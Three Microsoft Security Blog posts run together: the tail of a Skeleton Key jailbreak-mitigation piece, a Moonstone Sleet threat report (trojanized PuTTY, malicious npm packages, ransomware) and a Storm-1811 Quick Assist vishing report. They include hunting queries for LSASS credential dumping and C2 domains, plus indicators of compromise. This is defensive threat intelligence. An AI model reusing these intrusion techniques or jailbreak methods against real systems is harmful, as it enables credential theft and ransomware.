• System message: Prompt engineering the system prompts to clearly instruct the large language model (LLM) on appropriate behavior and to provide additional safeguards. For instance, specify that any attempts to undermine the safety guardrail instructions should be prevented (read our guidance on building a system message framework here).
• Output filtering: Azure AI Content Safety post-processing filter that identifies and prevents output generated by the model that breaches safety criteria.
• Abuse monitoring: Deploying an AI-driven detection system trained on adversarial examples, and using content classification, abuse pattern capture, and other methods to detect and mitigate instances of recurring content and/or behaviors that suggest use of the service in a manner that may violate guardrails. As a separate AI system, it avoids being influenced by malicious instructions. Microsoft Azure OpenAI Service abuse monitoring is an example of this approach.

Building AI solutions on Azure

Microsoft provides tools for customers developing their own applications on Azure. Azure AI Content Safety Prompt Shields are enabled by default for models hosted in the Azure AI model catalog as a service, and they are parameterized by a severity threshold. We recommend setting the most restrictive threshold to ensure the best protection against safety violations. These input and output filters act as a general defense not only against this particular jailbreak technique, but also a broad set of emerging techniques that attempt to generate harmful content. Azure also provides built-in tooling for model selection, prompt engineering, evaluation, and monitoring. For example, risk and safety evaluations in Azure AI Studio can assess a model and/or application for susceptibility to jailbreak attacks using synthetic adversarial datasets, while Microsoft Defender for Cloud can alert security operations teams to jailbreaks and other active threats.

With the integration of Azure AI and Microsoft Security (Microsoft Purview and Microsoft Defender for Cloud) security teams can also discover, protect, and govern these attacks. The new native integration of Microsoft Defender for Cloud with Azure OpenAI Service, enables contextual and actionable security alerts, driven by Azure AI Content Safety Prompt Shields and Microsoft Defender Threat Intelligence. Threat protection for AI workloads allows security teams to monitor their Azure OpenAI powered applications in runtime for malicious activity associated with direct and in-direct prompt injection attacks, sensitive data leaks and data poisoning, or denial of service attacks.

References

• Attacks, Defenses and Evaluations for LLM Conversation Safety: A Survey (Shanghai AI Laboratory)
• AI jailbreaks: What they are and how they can be mitigated
• How Microsoft discovers and mitigates evolving attacks against AI guardrails

Learn more

To learn more about Microsoft’s Responsible AI principles and approach, refer to http://approjects.co.za/?big=ai/principles-and-approach.

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Mitigating Skeleton Key, a new type of generative AI jailbreak technique appeared first on Microsoft Security Blog.

Moonstone Sleet uses tactics, techniques, and procedures (TTPs) also used by other North Korean threat actors over the last several years, highlighting the overlap among these groups. While Moonstone Sleet initially had overlaps with Diamond Sleet, the threat actor has since shifted to its own infrastructure and attacks, establishing itself as a distinct, well-resourced North Korean threat actor.

This blog describes several notable TTPs used by this threat actor as well as recommendations to defend against related attacks. As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the necessary information to secure their environments.

Who is Moonstone Sleet?

Moonstone Sleet is a threat actor behind a cluster of malicious activity that Microsoft assesses is North Korean state-aligned and uses both a combination of many tried-and-true techniques used by other North Korean threat actors and unique attack methodologies. When Microsoft first detected Moonstone Sleet activity, the actor demonstrated strong overlaps with Diamond Sleet, extensively reusing code from known Diamond Sleet malware like Comebacker and using well-established Diamond Sleet techniques to gain access to organizations, such as using social media to deliver trojanized software. However, Moonstone Sleet quickly shifted to its own bespoke infrastructure and attacks. Subsequently, Microsoft has observed Moonstone Sleet and Diamond Sleet conducting concurrent operations, with Diamond Sleet still utilizing much of its known, established tradecraft.

Moonstone Sleet has an expansive set of operations supporting its financial and cyberespionage objectives. These range from deploying custom ransomware to creating a malicious game, setting up fake companies, and using IT workers.

Moonstone Sleet tradecraft

Microsoft has observed Moonstone Sleet using the TTPs discussed in the following sections in various campaigns.

Trojanized PuTTY

In early August 2023, Microsoft observed Moonstone Sleet delivering a trojanized version of PuTTY, an open-source terminal emulator, via apps like LinkedIn and Telegram as well as developer freelancing platforms. Often, the actor sent targets a .zip archive containing two files: a trojanized version of putty.exe and url.txt, which contained an IP address and a password. If the provided IP and password were entered by the user into the PuTTY application, the application would decrypt an embedded payload, then load and execute it. Notably, before Moonstone Sleet used this initial access vector, Microsoft observed Diamond Sleet using a similar method – trojanized PuTTY and SumatraPDF — with comparable techniques for anti-analysis, as we reported in 2022:

The trojanized PuTTY executable drops a custom installer which kicks off execution of a series of stages of malware, as described below:

1. Stage 1 – Trojanized PuTTY: Decrypts, decompresses, and then executes the embedded stage 2 payload.
2. Stage 2 – SplitLoader installer/dropper: Decrypts, decompresses, and writes the Stage 3 payload, the SplitLoader DLL file, to disk. The installer also drops two encrypted files to disk, then executes SplitLoader via a scheduled task or registry run key.
3. Stage 3 – SplitLoader:Decrypts and decompresses the two encrypted files dropped by the stage 2 payload, then combines them to create the next-stage, another portable executable (PE) file.
4. Stage 4 – Trojan loader: Expects a compressed and encrypted PE file from the C2. Once received, the trojan loader decompresses, decrypts, and executes this file.

Microsoft has also observed Moonstone Sleet using other custom malware loaders delivered by PuTTY that behaved similarly and had argument overlap with previously observed Diamond Sleet malware artifacts, such as the following:

Malicious npm packages

Microsoft has observed Moonstone Sleet targeting potential victims with projects that used malicious npm packages. Often, the threat actor delivered these projects through freelancing websites or other platforms like LinkedIn. In one example, the threat actor used a fake company to send .zip files invoking a malicious npm package under the guise of a technical skills assessment. When loaded, the malicious package used curl to connect to an actor-controlled IP and drop additional malicious payloads like SplitLoader. In another incident, Moonstone Sleet delivered a malicious npm loader which led to credential theft from LSASS. Microsoft collaborated with GitHub to identify and remove repositories associated with this activity.

Malicious tank game

Since February 2024, Microsoft has observed Moonstone Sleet infecting devices using a malicious tank game it developed called DeTankWar (also called DeFiTankWar, DeTankZone, or TankWarsZone). DeTankWar is a fully functional downloadable game that requires player registration, including username/password and invite code. In this campaign, Moonstone Sleet typically approaches its targets through messaging platforms or by email, presenting itself as a game developer seeking investment or developer support and either masquerading as a legitimate blockchain company or using fake companies. To bolster the game’s superficial legitimacy, Moonstone Sleet has also created a robust public campaign that includes the websites detankwar[.]com and defitankzone[.]com, and many X (Twitter) accounts for the personas it uses to approach targets and for the game itself.

Moonstone Sleet used a fake company called C.C. Waterfall to contact targets. The email presented the game as a blockchain-related project and offered the target the opportunity to collaborate, with a link to download the game included in the body of the message. More details about C.C. Waterfall and another fake company that Moonstone Sleet set up to trick targets are included below:

When targeted users launch the game, delfi-tank-unity.exe, additional included malicious DLLs are also loaded. The payload is a custom malware loader that Microsoft tracks as YouieLoad. Similarly to SplitLoader, YouieLoad loads malicious payloads in memory and creates malicious services that perform functions such as network and user discovery and browser data collection. For compromised devices of particular interest to the group, the threat actor launches hands-on-keyboard commands with further discovery and conducts credential theft.

Ransomware

In April 2024, Microsoft observed Moonstone Sleet delivering a new custom ransomware variant we have named FakePenny against a company it previously compromised in February. FakePenny includes a loader and an encryptor. Although North Korean threat actor groups have previously developed custom ransomware, this is the first time we have observed this threat actor deploying ransomware.

Microsoft assesses that Moonstone Sleet’s objective in deploying the ransomware is financial gain, suggesting the actor conducts cyber operations for both intelligence collection and revenue generation. Of note, the ransomware note dropped by FakePenny closely overlaps with the note used by Seashell Blizzard in its malware NotPetya. The ransom demand was $6.6M USD in BTC. This is in stark contrast to the lower ransom demands of previous North Korea ransomware attacks, like WannaCry 2.0 and H0lyGh0st.

Fake companies

Since January 2024, Microsoft has observed Moonstone Sleet creating several fake companies impersonating software development and IT services, typically relating to blockchain and AI. The actor has used these companies to reach out to potential targets, using a combination of created websites and social media accounts to add legitimacy to their campaigns.

StarGlow Ventures

From January to April 2024, Moonstone Sleet’s fake company StarGlow Ventures posed as a legitimate software development company. The group used a custom domain, fake employee personas, and social media accounts, in an email campaign targeting thousands of organizations in the education and software development sectors. In the emails Moonstone Sleet sent as part of this campaign, the actor complimented the work of the targeted organization and offered collaboration and support for upcoming projects, citing expertise in the development of web apps, mobile apps, blockchain, and AI.

These emails also contained a 1×1 tracking pixel, which likely enabled Moonstone Sleet to track which targets engaged with the emails, and a link to a dummy unsubscribe page hosted on the StarGlow Ventures domain. While the emails did not contain any malicious links, Microsoft assesses Moonstone Sleet likely used this campaign to establish a relationship with target organizations. Although the purpose of these relationships is unclear, they may afford the actor access to organizations of interest or be used as revenue generation opportunities. Microsoft notified customers who were impacted by this Moonstone Sleet campaign.

C.C. Waterfall

In a similar campaign, Moonstone Sleet sent emails using its fake company C.C. Waterfall, a purported IT consulting organization.

In this campaign, Moonstone Sleet emailed higher education organizations, claiming the company was either hiring new developers or looking for business collaboration opportunities. This campaign likely had similar goals to the StarGlow Ventures campaign: to build relationships with organizations which could be leveraged for revenue generation or malicious access.  

As previously mentioned, Moonstone Sleet also used C.C. Waterfall to contact targets and invite them to download the actor’s tank game, highlighting that this is a coordinated and concerted effort for which Moonstone Sleet can leverage multiple facets of its operations in overlapping campaigns.

Work-for-hire

In addition to creating fake companies, Microsoft has observed Moonstone Sleet pursuing employment in software development positions at multiple legitimate companies. This activity could be consistent with previous reporting from the United States Department of Justice that North Korea was using highly skilled remote IT workers to generate revenue. On the other hand, this Moonstone Sleet activity may also be another approach to gaining access to organizations.

Moonstone Sleet targets

Moonstone Sleet’s primary goals appear to be espionage and revenue generation. Targeted sectors to date include both individuals and organizations in the software and information technology, education, and defense industrial base sectors.

Software companies and developers

Since early January 2024, Moonstone Sleet has used the above fake software development companies to solicit work or cooperation. This actor has also targeted individuals looking for work in software development, sending candidates a “skills test” that instead delivers malware via a malicious NPM package.

Aerospace

In early December 2023, we observed Moonstone Sleet compromising a defense technology company to steal credentials and intellectual property. In April 2024, the actor ransomed the organization using FakePenny. The same month, we observed Moonstone Sleet compromise a company that makes drone technology. In May 2024, the threat actor compromised a company that makes aircraft parts.

Fitting into the North Korean threat actor landscape

Moonstone Sleet’s diverse set of tactics is notable not only because of their effectiveness, but because of how they have evolved from those of several other North Korean threat actors over many years of activity to meet North Korean cyber objectives. For example, North Korea has for many years maintained a cadre of remote IT workers to generate revenue in support of the country’s objectives. Moonstone Sleet’s pivot to conduct IT work within its campaigns indicates it may not only be helping with this strategic initiative, but possibly also expanding the use of remote IT workers beyond just financial gain. Additionally, Moonstone Sleet’s addition of ransomware to its playbook, like another North Korean threat actor, Onyx Sleet, may suggest it is expanding its set of capabilities to enable disruptive operations. Microsoft reported on Onyx Sleet’s and Storm-0530’s h0lyGhost ransomware in 2022.

Moonstone Sleet’s ability to conduct concurrent operations across multiple campaigns, the robustness of the malicious game, and the use of a custom new ransomware variant are strong indications that this threat actor may be well-resourced. Moreover, given that Moonstone Sleet’s initial attacks mirrored Diamond Sleet methodologies and heavily reused Diamond Sleet’s code in their payloads, Microsoft assesses this actor is equipped with capabilities from prior cyber operations conducted by other North Korean actors.

Microsoft has identified several techniques used by Moonstone Sleet that have previously been used by other North Korean threat actors. For example, since late 2023, an actor that Microsoft tracks as Storm-1877 used malicious npm packages in a campaign targeting software developers with JavaScript-based malware. This campaign was reported publicly by PaloAlto as Contagious Interview. Additionally, in 2023, GitHub reported that Jade Sleet used malicious npm packages in a campaign consisting of fake developer and recruiter personas that operated on LinkedIn, Slack, and Telegram. This shared use of a relatively uncommon tactic across multiple distinct North Korean groups may suggest sharing of expertise and TTPs among North Korean threat actors.

In recent months, Microsoft and other security researchers have reported on North Korean threat actors’ use of software supply chain attacks to conduct widespread malicious operations. In November 2023, Microsoft reported on Diamond Sleet’s supply chain compromise of CyberLink, a multimedia application. While Microsoft has not yet identified any Moonstone Sleet supply chain attacks, the actor has extensively targeted software development firms in its campaigns. Large-scale access to software companies would pose a particularly high risk for future supply chain attacks against those organizations.

Moonstone Sleet’s appearance is an interesting development considering that North Korea has carried out a series of changes in its foreign relations and security apparatus. In November 2023, North Korea closed embassies in several countries, and in March 2024, may have dissolved the United Front Department (UFD), an agency believed to be responsible for reunification and propaganda.

Despite being new, Moonstone Sleet has demonstrated that it will continue to mature, develop, and evolve, and has positioned itself to be a preeminent threat actor conducting sophisticated attacks on behalf of the North Korean regime.

Recommendations

Microsoft recommends the following mitigations defend against attacks by Moonstone Sleet:

• Detect human-operated ransomware attacks with Microsoft Defender XDR. 
• Enable controlled folder access. 
• Ensure that tamper protection is enabled in Microsoft Dender for Endpoint. 
• Enable network protection in Microsoft Defender for Endpoint. 
• Follow the credential hardening recommendations in our on-premises credential theft overview to defend against common credential theft techniques like LSASS access.
• Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.    
• Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. 
• Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.

Microsoft Defender XDR customers can turn on the following attack surface reduction rule to prevent common attack techniques used by Moonstone Sleet.

• Block executable content from email client and webmail 
• Block executable files from running unless they meet a prevalence, age, or trusted list criterion 
• Use advanced protection against ransomware 
• Block credential stealing from the Windows local security authority subsystem (lsass.exe)

Detection details

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

• Behavior:Win64/PennyCrypt
• HackTool:Win32/Mimikatz
• HackTool:Win64/Mimikatz
• TrojanDropper:Win32/SplitLoader
• TrojanDropper:Win64/YouieLoad

Microsoft Defender for Endpoint

Alerts with the following titles in the security center can indicate threat activity on your network: 

• Moonstone Sleet actor activity detected
• Suspicious activity linked to a North Korean state-sponsored threat actor has been detected
• Diamond Sleet Actor activity detected

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity: 

• Malicious credential theft tool execution detected  
• Mimikatz credential theft tool 
• Ransomware-linked threat actor detected
• Suspicious access to LSASS service

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Detect Procdump dumping LSASS credentials:

DeviceProcessEvents
| where (FileName has_any ("procdump.exe",
"procdump64.exe") and ProcessCommandLine has "lsass") or  
(ProcessCommandLine
has "lsass.exe" and (ProcessCommandLine has "-accepteula"
or ProcessCommandLine contains "-ma"))

Detect connectivity with C2 infrastructure:

let c2servers = dynamic(['mingeloem.com','matrixane.com']);
DeviceNetworkEvents
| where RemoteUrl has_any (c2servers)
| project DeviceId, LocalIP, DeviceName, RemoteUrl, InitiatingProcessFileName, InitiatingProcessCommandLine, Timestamp

Detect connectivity to DeTank websites:

let c2servers = dynamic(['detankwar.com','defitankzone.com']);
DeviceNetworkEvents
| where RemoteUrl has_any (c2servers)
| project DeviceId, LocalIP, DeviceName, RemoteUrl, InitiatingProcessFileName, InitiatingProcessCommandLine, Timestamp

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Microsoft Sentinel customers can also use the queries below to detect activity detailed in this blog.

This query detects the installation of a Windows service that contains artifacts from credential dumping tools such as Mimikatz:

• Credential Dumping Tools – Service Installation

This query detects the use of Procdump to dump credentials from LSASS memory:

• Dump credential using procdump

Microsoft Sentinel customers can also use the following query, which looks for Microsoft Defender AV detections related to the Moonstone Sleet. In Microsoft Sentinel, the SecurityAlerts table includes only the DeviceName of the affected device. This query joins the DeviceInfo table to connect other information such as device group, IP, signed-in users, etc., allowing analysts to have more context related to the alert, if available:

let MoonStoneSleet_threats = dynamic(["Behavior:Win64/PennyCrypt", "HackTool:Win32/Mimikatz", "HackTool:Win64/Mimikatz ", "TrojanDropper:Win32/SplitLoader", "TrojanDropper:Win64/YouieLoad" ]);
SecurityAlert
| where ProviderName == "MDATP"
| extend ThreatName = tostring(parse_json(ExtendedProperties).ThreatName)
| extend ThreatFamilyName = tostring(parse_json(ExtendedProperties).ThreatFamilyName)
| where ThreatName in~ (MoonStoneSleet_threats) or ThreatFamilyName in~ (MoonStoneSleet_threats)
| extend CompromisedEntity = tolower(CompromisedEntity)
| join kind=inner (
    DeviceInfo
    | extend DeviceName = tolower(DeviceName)
) on $left.CompromisedEntity == $right.DeviceName
| summarize arg_max(TimeGenerated, *) by DisplayName, ThreatName, ThreatFamilyName, PublicIP, AlertSeverity, Description, tostring(LoggedOnUsers), DeviceId, TenantId, CompromisedEntity, ProductName, Entities
| extend HostName = tostring(split(CompromisedEntity, ".")[0]), DomainIndex = toint(indexof(CompromisedEntity, '.'))
| extend HostNameDomain = iff(DomainIndex != -1, substring(CompromisedEntity, DomainIndex + 1), CompromisedEntity)
| project-away DomainIndex
| project TimeGenerated, DisplayName, ThreatName, ThreatFamilyName, PublicIP, AlertSeverity, Description, LoggedOnUsers, DeviceId, TenantId, CompromisedEntity, ProductName, Entities, HostName, HostNameDomain

Indicators of compromise

Malicious files

Moonstone Sleet domains

References

• Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear Hallmarks of North Korean Threat Actors (Palo Alto Unit 42)
• Security alert: social engineering campaign targets technology industry employees (Github)

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks appeared first on Microsoft Security Blog.

June 2024 update: At the end of May 2024, Microsoft Threat Intelligence observed Storm-1811 using Microsoft Teams as another vector to contact target users. Microsoft assesses that the threat actor uses Teams to send messages and initiate calls in an attempt to impersonate IT or help desk personnel. This activity leads to Quick Assist misuse, followed by credential theft using EvilProxy, execution of batch scripts, and use of SystemBC for persistence and command and control.

Since mid-April 2024, Microsoft Threat Intelligence has observed the threat actor Storm-1811 misusing the client management tool Quick Assist to target users in social engineering attacks. Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware. The observed activity begins with impersonation through voice phishing (vishing), followed by delivery of malicious tools, including remote monitoring and management (RMM) tools like ScreenConnect and NetSupport Manager, malware like Qakbot, Cobalt Strike, and ultimately Black Basta ransomware.

Quick Assist is an application that enables a user to share their Windows or macOS device with another person over a remote connection. This enables the connecting user to remotely connect to the receiving user’s device and view its display, make annotations, or take full control, typically for troubleshooting. Threat actors misuse Quick Assist features to perform social engineering attacks by pretending, for example, to be a trusted contact like Microsoft technical support or an IT professional from the target user’s company to gain initial access to a target device.

In addition to protecting customers from observed malicious activity, Microsoft is investigating the use of Quick Assist in these attacks and is working on improving the transparency and trust between helpers and sharers, and incorporating warning messages in Quick Assist to alert users about possible tech support scams. Microsoft Defender for Endpoint detects components of activity originating from Quick Assist sessions as well as follow-on activity, and Microsoft Defender Antivirus detects the malware components associated with this activity.

Organizations can also reduce the risk of attacks by blocking or uninstalling Quick Assist and other remote management tools if the tools are not in use in their environment. Quick Assist is installed by default on devices running Windows 11. Additionally, tech support scams are an industry-wide issue where scammers use scare tactics to trick users into unnecessary technical support services. Educating users on how to recognize such scams can significantly reduce the impact of social engineering attacks. 

Social engineering

One of the social engineering techniques used by threat actors to obtain initial access to target devices using Quick Assist is through vishing attacks. Vishing attacks are a form of social engineering that involves callers luring targets into revealing sensitive information under false pretenses or tricking targets into carrying out actions on behalf of the caller.

For example, threat actors might attempt to impersonate IT or help desk personnel, pretending to conduct generic fixes on a device. In other cases, threat actors initiate link listing attacks – a type of email bombing attack, where threat actors sign up targeted emails to multiple email subscription services to flood email addresses indirectly with subscribed content. Following the email flood, the threat actor impersonates IT support through phone calls to the target user, claiming to offer assistance in remediating the spam issue.

At the end of May 2024, Microsoft observed Storm-1811 using Microsoft Teams to send messages to and call target users. Tenants created by the threat actor are used to impersonate help desk personnel with names displayed as “Help Desk”, “Help Desk IT”, “Help Desk Support”, and “IT Support”. Microsoft has taken action to mitigate this by suspending identified accounts and tenants associated with inauthentic behavior. Apply security best practices for Microsoft Teams to safeguard Teams users.

During the call, the threat actor persuades the user to grant them access to their device through Quick Assist. The target user only needs to press CTRL + Windows + Q and enter the security code provided by the threat actor, as shown in the figure below.

After the target enters the security code, they receive a dialog box asking for permission to allow screen sharing. Selecting Allow shares the user’s screen with the actor.

Once in the session, the threat actor can select Request Control, which if approved by the target, grants the actor full control of the target’s device.

Follow-on activity leading to Black Basta ransomware

Once the user allows access and control, the threat actor runs a scripted cURL command to download a series of batch files or ZIP files used to deliver malicious payloads. Some of the batch scripts observed reference installing fake spam filter updates requiring the targets to provide sign-in credentials. In several cases, Microsoft Threat Intelligence identified such activity leading to the download of Qakbot, RMM tools like ScreenConnect and NetSupport Manager, and Cobalt Strike.

Qakbot has been used over the years as a remote access vector to deliver additional malicious payloads that led to ransomware deployment. In this recent activity, Qakbot was used to deliver a Cobalt Strike Beacon attributed to Storm-1811.

ScreenConnect was used to establish persistence and conduct lateral movement within the compromised environment. NetSupport Manager is a remote access tool used by multiple threat actors to maintain control over compromised devices. An attacker might use this tool to remotely access the device, download and install additional malware, and launch arbitrary commands.

The mentioned RMM tools are commonly used by threat actors because of their extensive capabilities and ability to blend in with the environment. In some cases, the actors leveraged the OpenSSH tunneling tool to establish a secure shell (SSH) tunnel for persistence. 

After the threat actor installs the initial tooling and the phone call is concluded, Storm-1811 leverages their access and performs further hands-on-keyboard activities such as domain enumeration and lateral movement.

In cases where Storm-1811 relies on Teams messages followed by phone calls and remote access through Quick Assist, the threat actor uses BITSAdmin to download batch files and ZIP files from a malicious site, for example antispam3[.]com. Storm-1811 also provides the target user with malicious links that redirect the user to an EvilProxy phishing site to input credentials. EvilProxy is an adversary-in-the-middle (AiTM) phishing kit used to capture passwords, hijack a user’s sign-in session, and skip the authentication process. Storm-1811 was also observed deploying SystemBC, a post-compromise commodity remote access trojan (RAT) and proxy tool typically used to establish command-and-control communication, establish persistence in a compromised environment, and deploy follow-on malware, notably ransomware.

In several cases, Storm-1811 uses PsExec to deploy Black Basta ransomware throughout the network. Black Basta is a closed ransomware offering (exclusive and not openly marketed like ransomware as a service) distributed by a small number of threat actors who typically rely on other threat actors for initial access, malicious infrastructure, and malware development. Since Black Basta first appeared in April 2022, Black Basta attackers have deployed the ransomware after receiving access from Qakbot and other malware distributors, highlighting the need for organizations to focus on attack stages prior to ransomware deployment to reduce the threat. In the next sections, we share recommendations for improving defenses against this threat, including best practices when using Quick Assist and mitigations for reducing the impact of Black Basta and other ransomware.

Recommendations

Microsoft recommends the following best practices to protect users and organizations from attacks and threat actors that misuse Quick Assist:

• Consider blocking or uninstalling Quick Assist and other remote monitoring and management tools if these tools are not in use in your environment. If your organization utilizes another remote support tool such as Remote Help, block or remove Quick Assist as a best practice. Remote Help is part of the Microsoft Intune Suite and provides authentication and security controls for helpdesk connections.
• Educate users about protecting themselves from tech support scams. Tech support scams are an industry-wide issue where scammers use scary tactics to trick users into unnecessary technical support services.
• Only allow a helper to connect to your device using Quick Assist if you initiated the interaction by contacting Microsoft Support or your IT support staff directly. Don’t provide access to anyone claiming to have an urgent need to access your device.
• If you suspect that the person connecting to your device is conducting malicious activity, disconnect from the session immediately and report to your local authorities and/or any relevant IT members within your organization.
• Users who have been affected by a tech support scam can also use the Microsoft technical support scam form to report it.

Microsoft recommends the following mitigations to reduce the impact of this threat:

• Educate users about protecting personal and business information in social media, filtering unsolicited communication, identifying lure links in phishing emails, and reporting reconnaissance attempts and other suspicious activity.
• Educate users about preventing malware infections, such as ignoring or deleting unsolicited and unexpected emails or attachments sent through instant messaging applications or social networks as well as suspicious phone calls.
• Invest in advanced anti-phishing solutions that monitor incoming emails and visited websites. Microsoft Defender for Office 365 brings together incident and alert management across email, devices, and identities, centralizing investigations for email-based threats.
• Educate Microsoft Teams users to verify ‘External’ tagging on communication attempts from external entities, be cautious about what they share, and never share their account information or authorize sign-in requests over chat.
• Implement Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
• Apply Microsoft’s security best practices for Microsoft Teams to safeguard Teams users.
• Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
• Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
• Turn on tamper protection features to prevent attackers from stopping security services.
• Enable investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
• Refer to Microsoft’s human-operated ransomware overview for general hardening recommendations against ransomware attacks.

Microsoft Defender XDR customers can turn on attack surface reduction rules to prevent common attack techniques:

• Block executable files from running unless they meet a prevalence, age, or trusted list criterion
• Block execution of potentially obfuscated scripts
• Block process creations originating from PSExec and WMI commands
• Use advanced protection against ransomware

Detection details

Microsoft Defender Antivirus 

Microsoft Defender Antivirus detects Qakbot downloaders, implants, and behavior as the following malware:

• TrojanDownloader:O97M/Qakbot
• Trojan:Win32/QBot
• Trojan:Win32/Qakbot
• TrojanSpy:Win32/Qakbot
• Behavior:Win32/Qakbot

Black Basta threat components are detected as the following:

• Behavior:Win32/Basta
• Ransom:Win32/Basta
• Trojan:Win32/Basta

Microsoft Defender Antivirus detects Beacon running on a victim process as the following:

• Behavior:Win32/CobaltStrike
• Backdoor:Win64/CobaltStrike
• HackTool:Win64/CobaltStrike

Additional Cobalt Strike components are detected as the following:

• TrojanDropper:PowerShell/Cobacis
• Trojan:Win64/TurtleLoader.CS
• Exploit:Win32/ShellCode.BN

SystemBC components are detected as:

• Behavior:Win32/SystemBC
• Trojan: Win32/SystemBC

Microsoft Defender for Endpoint

Alerts with the following title in the security center can indicate threat activity on your network:

• Suspicious activity using Quick Assist

The following alerts might also indicate activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.

• Suspicious curl behavior
• Suspicious bitsadmin activity
• Suspicious file creation by BITSAdmin tool
• A file or network connection related to a ransomware-linked emerging threat activity group detected —This alert captures Storm-1811 activity
• Ransomware-linked emerging threat activity group Storm-0303 detected — This alert captures some Qakbot distributor activity
• Possible Qakbot activity
• Possible NetSupport Manager activity
• Possibly malicious use of proxy or tunneling tool
• Suspicious usage of remote management software
• Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)
• Human-operated attack using Cobalt Strike
• Human-operated attack implant tool detected
• Ransomware behavior detected in the file system

Indicators of compromise

Domain names:

• upd7a[.]com
• upd7[.]com
• upd9[.]com
• upd5[.]pro
• antispam3[.]com
• antispam2[.]com

SHA-256:

• 71d50b74f81d27feefbc2bc0f631b0ed7fcdf88b1abbd6d104e66638993786f8
• 0f9156f91c387e7781603ed716dcdc3f5342ece96e155115708b1662b0f9b4d0
• 1ad05a4a849d7ed09e2efb38f5424523651baf3326b5f95e05f6726f564ccc30
• 93058bd5fe5f046e298e1d3655274ae4c08f07a8b6876e61629ae4a0b510a2f7
• 1cb1864314262e71de1565e198193877ef83e98823a7da81eb3d59894b5a4cfb

ScreenConnect relay:

• instance-olqdnn-relay.screenconnect[.]com

NetSupport C2:

• greekpool[.]com

Cobalt Strike Beacon C2:

• zziveastnews[.]com
• realsepnews[.]com

Advanced hunting 

Microsoft Defender XDR

To locate possible malicious activity, run the following query in the Microsoft Defender portal:

This query looks for possible email bombing activity:

EmailEvents
| where EmailDirection == "Inbound"
| make-series Emailcount = count()
              on Timestamp step 1h by RecipientObjectId
| extend (Anomalies, AnomalyScore, ExpectedEmails) = series_decompose_anomalies(Emailcount)
| mv-expand Emailcount, Anomalies, AnomalyScore, ExpectedEmails to typeof(double), Timestamp
| where Anomalies != 0
| where AnomalyScore >= 10

This query looks for possible Teams phishing activity.

let suspiciousUpns = DeviceProcessEvents
| where DeviceId == "alertedMachine"
| where isnotempty(InitiatingProcessAccountUpn)
| project InitiatingProcessAccountUpn;
CloudAppEvents
| where Application == "Microsoft Teams"
| where ActionType == "ChatCreated"
| where isempty(AccountObjectId)
| where RawEventData.ParticipantInfo.HasForeignTenantUsers == true
| where RawEventData.CommunicationType == "OneonOne"
| where RawEventData.ParticipantInfo.HasGuestUsers == false
| where RawEventData.ParticipantInfo.HasOtherGuestUsers == false
| where RawEventData.Members[0].DisplayName in ("Microsoft  Security", "Help Desk", "Help Desk Team", "Help Desk IT", "Microsoft Security", "office")
| where AccountId has "@"
| extend TargetUPN = tolower(tostring(RawEventData.Members[1].UPN))
| where TargetUPN in (suspiciousUpns)

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Microsoft Sentinel also has a range of hunting queries available in Sentinel GitHub repo or as part of Sentinel solutions that customers can use to detect the activity detailed in this blog in addition to Microsoft Defender detections. These hunting queries include the following:

Qakbot:

• Qakbot hunting queries

Cobalt Strike:

• Cobalt Strike DNS Beaconing
• Potential ransomware activity related to Cobalt Strike
• Suspicious named pipes
• Cobalt Strike Invocation using WMI

References

• Defense and Mitigations from E-mail Bombing. U.S. Department of Health and Human Services, Health Sector Cybersecurity Coordination Center

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

